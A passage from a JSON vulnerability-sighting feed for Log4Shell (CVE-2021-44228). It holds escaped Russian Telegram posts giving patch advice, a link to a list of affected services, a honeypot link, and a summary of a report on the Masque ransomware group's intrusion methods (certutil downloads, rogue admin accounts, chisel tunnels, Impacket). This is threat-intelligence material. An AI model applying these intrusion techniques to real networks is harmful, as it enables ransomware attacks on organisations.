\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434, \u043d\u043e \u0442\u0430\u043a\u0436\u0435 \u0438 \u043b\u0451\u0433\u043a\u043e\u0441\u0442\u044c\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \n\n \ud83d\udcc8 \u0411\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432 \u043f\u0435\u0440\u0432\u044b\u0435 \u0436\u0435 \u0447\u0430\u0441\u044b \u0431\u044b\u043b\u043e \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043e \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0432\u0448\u0438\u0445 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u044c \u0438 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u0443\u044e \u0446\u0435\u043b\u044c. \u042d\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043a \u043e\u0433\u0440\u043e\u043c\u043d\u043e\u043c\u0443 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u0443\u0441\u043f\u0435\u0448\u043d\u044b\u0445 \u0430\u0442\u0430\u043a, \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u044b \u043d\u0430\u0432\u0435\u0440\u043d\u044f\u043a\u0430 \u0435\u0449\u0451 \u0443\u0437\u043d\u0430\u0435\u043c \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u043d\u0435\u0434\u0435\u043b\u044c.\n\n\ud83d\udccc \u0412 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0430\u0432\u0442\u043e\u0440\u0430\u043c\u0438 log4j \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 v2.16.0, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0435\u0435 \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c. \u0412\u0441\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 \u044d\u0442\u0443 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443, \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u044b, \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0430\u0442\u0430\u043a\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u0432 \u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u0443\u044e \u0447\u0430\u0441\u0442\u044c \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0440\u044f\u0434\u043e\u0432\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043d\u0435 \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f \u043d\u0438\u0447\u0435\u0433\u043e, \u043a\u0440\u043e\u043c\u0435 \u0441\u043c\u0435\u043d\u044b \u0441\u0432\u043e\u0438\u0445 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0432\u0441\u0435\u0445 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u0445 (\u0438\u0445 \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u0437\u0434\u0435\u0441\u044c: \n\nhttps://github.com/YfryTchsGD/Log4jAttackSurface\n\n\ud83d\udd08\u0414\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043c\u0430\u043b\u043e\u0433\u043e \u0438 \u0441\u0440\u0435\u0434\u043d\u0435\u0433\u043e \u0431\u0438\u0437\u043d\u0435\u0441\u0430, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0443\u0431\u0435\u0434\u0438\u0442\u044c\u0441\u044f, \u0447\u0442\u043e \u0432\u043e \u0432\u0441\u0435\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0441\u0435\u0442\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445, \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 log4j \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 v2.16.0+ \u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043e\u0442\u043a\u0430\u0437\u0430\u0442\u044c\u0441\u044f \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0442\u0435\u0445, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0442\u0430\u043a\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u043a\u0430 \u043d\u0435\u0442.", "creation_timestamp": "2022-06-04T09:59:36.000000Z"}, {"uuid": "1f9b4ad3-c0c5-45d5-99b5-41e71d26c446", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/S_E_Reborn/5329", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 F.A.C.C.T. \u0432 \u043d\u043e\u0432\u043e\u043c \u043e\u0442\u0447\u0435\u0442\u0435 \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0445 \u043a\u043e\u0434\u043e\u0432 \u0438\u00a0\u0431\u0438\u043b\u0434\u0435\u0440\u043e\u0432 ransomware (Babuk, Conti \u0438\u00a0LockBit 3 (Black) \u0432 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0433\u0435\u043e\u043f\u043e\u043b\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438 \u043f\u043e\u0440\u043e\u0434\u0438\u043b\u0430 \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0445 \u0433\u0440\u0443\u043f\u043f, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430\u00a0\u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0438\u00a0\u0444\u0438\u0437\u043b\u0438\u0446.\n\n\u041d\u0430\u0440\u044f\u0434\u0443 \u0441\u00a0\u043f\u043e\u043b\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0445\u0430\u043a\u0442\u0438\u0432\u0438\u0441\u0442\u0430\u043c\u0438 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0435\u0439 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0438\u00a0\u043e\u0431\u044b\u0447\u043d\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u043d\u043e\u0432\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u044b \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Masque.\n\nMasque \u2013 \u0440\u0443\u0441\u0441\u043a\u043e\u0433\u043e\u0432\u043e\u0440\u044f\u0449\u0430\u044f \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u043e \u043c\u043e\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0449\u0430\u044f \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0439 \u0431\u0438\u0437\u043d\u0435\u0441 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 LockBit 3 (Black) \u0438 Babuk (ESXi). \n\n\u0421\u0443\u043c\u043c\u0430 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u044b\u043a\u0443\u043f\u0430 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 5-10 \u043c\u043b\u043d. \u0440\u0443\u0431\u043b\u0435\u0439 (\u0432 BTC \u0438\u043b\u0438 XMR).\n\n\u0421\u0432\u043e\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0433\u0440\u0443\u043f\u043f\u0430 Masque \u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u00a0\u044f\u043d\u0432\u0430\u0440\u044f 2024 \u0433\u043e\u0434\u0430, \u0441\u00a0\u043c\u0430\u044f \u043f\u043e\u00a0\u043e\u043a\u0442\u044f\u0431\u0440\u044c 2024 \u0433\u043e\u0434\u0430 \u0431\u044b\u043b\u043e \u0437\u0430\u043c\u0435\u0442\u043d\u043e\u0435 \u0441\u043d\u0438\u0436\u0435\u043d\u0438\u0435 \u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438. \u041e\u0434\u043d\u0430\u043a\u043e \u0432\u00a0\u043d\u043e\u044f\u0431\u0440\u0435-\u0434\u0435\u043a\u0430\u0431\u0440\u0435 2024 \u0433\u043e\u0434\u0430 \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u043b\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0430\u0442\u0430\u043a \u043d\u0430\u00a0\u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0443\u043f\u043d\u044b\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438.\n\n\u0412 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0441\u043b\u0443\u0447\u0430\u0435\u0432 \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u043c \u0432\u0435\u043a\u0442\u043e\u0440\u043e\u043c \u0430\u0442\u0430\u043a\u0438 Masque \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a VMware Horizon, \u0447\u0435\u0440\u0435\u0437 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-44228 (log4shell).\n\n\u041f\u043e\u0441\u043b\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0432\u00a0\u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043b\u0430\u0446\u0434\u0430\u0440\u043c\u0430 \u0434\u043b\u044f\u00a0\u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f \u0430\u0442\u0430\u043a\u0438.\n\n\u041f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a AnyDesk, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0442 \u0441\u00a0\u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u044b certutil.\n\n\u0414\u043b\u044f \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438, \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u044f \u0438\u0445 \u0432\u00a0\u0433\u0440\u0443\u043f\u043f\u0443 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043e\u043d\u0438 \u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u00a0\u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0438\u0445 \u0432\u00a0\u0433\u0440\u0443\u043f\u043f\u0443 Enterprise Admins, \u0447\u0442\u043e\u0431\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0438\u0445 \u043f\u0440\u0438\u00a0\u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0438 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a\u0430.\n\n\u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435, \u043a\u0430\u043a \u043f\u0440\u0430\u0432\u0438\u043b\u043e, \u0446\u0435\u043b\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e \u043d\u0435 \u0442\u0440\u0430\u0442\u044f\u0442 \u0432\u0440\u0435\u043c\u044f \u043d\u0430\u00a0\u043e\u0431\u0445\u043e\u0434 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438\u00a0\u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439.\n\n\u0421\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u044e\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u043e\u0433\u0434\u0430, \u043a\u043e\u0433\u0434\u0430 \u043e\u043d\u0438 \u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0438\u043b\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0443 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u043b\u0438\u0431\u043e \u043f\u043e\u0441\u043b\u0435 \u0438\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438\u00a0\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438.\n\nMasque \u043d\u0430\u0441\u0442\u0440\u0430\u0438\u0432\u0430\u0435\u0442 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u0442\u0443\u043d\u043d\u0435\u043b\u0438 \u0434\u043b\u044f\u00a0\u0441\u0432\u044f\u0437\u0438 \u0441\u00a0\u04212 \u0441\u00a0\u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a chisel \u0438\u00a0LocaltoNet \u0434\u043b\u044f\u00a0\u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043a\u0430\u043d\u0430\u043b\u043e\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a\u00a0\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0436\u0435\u0440\u0442\u0432\u044b.\n\n\u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 RDP \u0438\u00a0SSH. \u0412 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 WinRM, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 SMBExec \u0438\u0437 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430 Impacket.\n\n\u0413\u0440\u0443\u043f\u043f\u0430 Masque \u043d\u0435 \u0443\u0434\u0435\u043b\u044f\u0435\u0442 \u0434\u043e\u043b\u0436\u043d\u043e\u0433\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u0433\u043b\u0443\u0431\u043e\u043a\u043e\u043c\u0443 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0436\u0435\u0440\u0442\u0432\u044b \u0438\u00a0\u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u044d\u0442\u043e\u0433\u043e \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u0435 \u043a\u043e\u043f\u0438\u0438 \u0447\u0430\u0441\u0442\u043e \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u043c\u0438, \u0430\u00a0\u0434\u0430\u043d\u043d\u044b\u0435 \u043d\u0430\u00a0\u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445 \u043d\u0435 \u0448\u0438\u0444\u0440\u0443\u044e\u0442\u0441\u044f \u0432\u043e\u0432\u0441\u0435.\n\n\u0414\u043b\u044f \u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0441\u043e \u0441\u0432\u043e\u0435\u0439 \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043c\u0435\u0441\u0441\u0435\u043d\u0434\u0436\u0435\u0440\u00a0Tox, \u0434\u043b\u044f\u00a0\u043a\u0430\u0436\u0434\u043e\u0439 \u0436\u0435\u0440\u0442\u0432\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0432\u043e\u0439 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, \u0433\u0440\u0443\u043f\u043f\u0430  \u043d\u0435 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0438\u0437\u043e\u0449\u0440\u0435\u043d\u043d\u044b\u0445 \u0438 \u0438\u043d\u043d\u043e\u0432\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432.\n\n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0443 \u0438\u043c\u0435\u0432\u0448\u0435\u0439 \u0434\u043e \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043f\u043e\u0440\u044b \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0441\u043a\u0443\u0434\u043d\u044b\u0439 \u0430\u0440\u0441\u0435\u043d\u0430\u043b Masque, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432\u0441\u0435 \u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043b\u044e\u0431\u043e\u043f\u044b\u0442\u043d\u0443\u044e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043d\u0430\u0437\u0432\u0430\u043b\u0438 MystiqueLoader.\n\n\u0412\u0441\u0435 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438, \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 TTPs \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u0438 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0437\u0430\u0449\u0438\u0442\u0435 - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 F.A.C.C.T.", "creation_timestamp": "2024-12-24T06:14:41.000000Z"}, {"uuid": "ba3db904-3951-483e-8bd7-0e029a8b4148", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "Telegram/3a2jD3gjNHncLnKc8fyr9DC3SGOgXMvvZ9Cx1ndl6893LxY", "content": "", "creation_timestamp": "2026-05-02T09:00:04.000000Z"}, {"uuid": "94d298a6-a196-43fe-9dc9-a1d670cf9593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/1293ch8Ejz37Bld-7cPFDNVaUXps0O1KbkL9Y08rxjhyzDG8", "content": "", "creation_timestamp": "2021-12-22T23:51:18.000000Z"}, {"uuid": "5fd37dd3-bee2-4420-a333-0b6b892d0fdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/S_E_Reborn/1519", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-44228 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache Log4j\n\nhttps://securelist.ru/cve-2021-44228-vulnerability-in-apache-log4j-library/104144/", "creation_timestamp": "2021-12-19T12:05:29.000000Z"}, {"uuid": "9207b33b-00a1-41ac-bbba-d0e4d9529429", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/S_E_Reborn/1584", "content": "log4j-honeypot-flask\n\nInternal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228\n\nhttps://github.com/BinaryDefense/log4j-honeypot-flask\n\n#honeypot #log4j", "creation_timestamp": "2021-12-28T21:28:00.000000Z"}, {"uuid": "95890914-0b95-468a-bf03-934e77374c77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "Telegram/EG2KBSSUoOE-kZXxEDmUQHKYe2tURuqAflYf0IXztEWLCnHI", "content": "", "creation_timestamp": "2021-12-28T09:54:14.000000Z"}, {"uuid": "46c06458-1cbc-473b-a82c-83a0de3c81da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 